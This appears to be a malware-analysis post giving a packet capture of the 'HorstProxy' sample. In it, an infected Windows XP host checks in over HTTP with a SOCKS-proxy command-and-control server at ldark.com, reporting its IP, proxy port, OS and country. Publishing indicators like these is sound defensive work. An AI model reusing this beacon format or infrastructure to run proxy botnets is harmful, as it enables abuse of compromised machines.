HISTORICAL Malware Sample – HorstProxy – Traffic Sample Indicators Analysis

By | July 25, 2015

2013-05-12 14:32:23.969210 IP 172.16.253.129.1057 > 69.43.161.152.80: Flags [P.], seq 1:126, ack 1, win 64240, length 125

E….;@…i…..E+…!.P.r……P…F\..GET /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 HTTP/1.1

User-Agent: Mozilla/5.0

Host: ldark.com

2013-05-12 14:32:23.969386 IP 69.43.161.152.80 > 172.16.253.129.1057: Flags [.], ack 126, win 64240, length 0

E..(……..E+…….P.!…..r..P………….

2013-05-12 14:32:24.102970 IP 69.43.161.152.80 > 172.16.253.129.1057: Flags [FP.], seq 1:290, ack 126, win 64240, length 289

E..I……..E+…….P.!…..r..P….e..HTTP/1.1 302 Found

Date: Tue, 14 May 2013 02:49:49 GMT

Server: Apache

X-Powered-By: PHP/5.3.3-7+squeeze15

Location: http://ww41.ldark.com/socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0

Content-Length: 0

Connection: close

Content-Type: text/html; charset=UTF-8

2013-05-12 14:32:24.350664 IP 172.16.253.129.1059 > 141.8.224.79.80: Flags [P.], seq 1:155, ack 1, win 64240, length 154

E….D@…………O.#.P.;k…V.P…>%..GET /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 HTTP/1.1

User-Agent: Mozilla/5.0

Host: ww41.ldark.com

Connection: Keep-Alive
